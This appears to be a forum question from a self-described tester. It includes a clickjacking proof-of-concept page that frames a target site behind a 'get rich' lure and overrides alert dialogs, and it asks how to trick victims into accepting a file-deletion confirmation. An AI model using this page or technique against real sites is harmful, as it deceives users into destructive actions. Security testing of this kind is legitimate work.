I am testing a web application for click-jacking vulnerability. The attack works fine for single clicks, however i am trying to delete a file and the hidden frame (victim) throws a pop-up confirmation.
Is there any way to hide the popup(same as of frame) and trick the user to accept it. I have googled a lot but no luck :(
Frame busting busters also not working.
Please help, Thanks
I am doing something wrong Click-jacking page code:
<html>
<body>
<script>
window.alert = function() { return false; }
</script>
<script>
window.onbeforeunload = function()
{
return "Maybe you want to leave the page, before you become rich??";
}
</script>
<style>
iframe {
width:100%;
height:100%;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
</style>
<div>Click on the link to get rich now:</div>
<iframe src="https://xyz.com/Forms/AllItems.aspx"></iframe>
<a href="https://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>
<div>You'll be rich for the whole life!</div>
</body>
</html>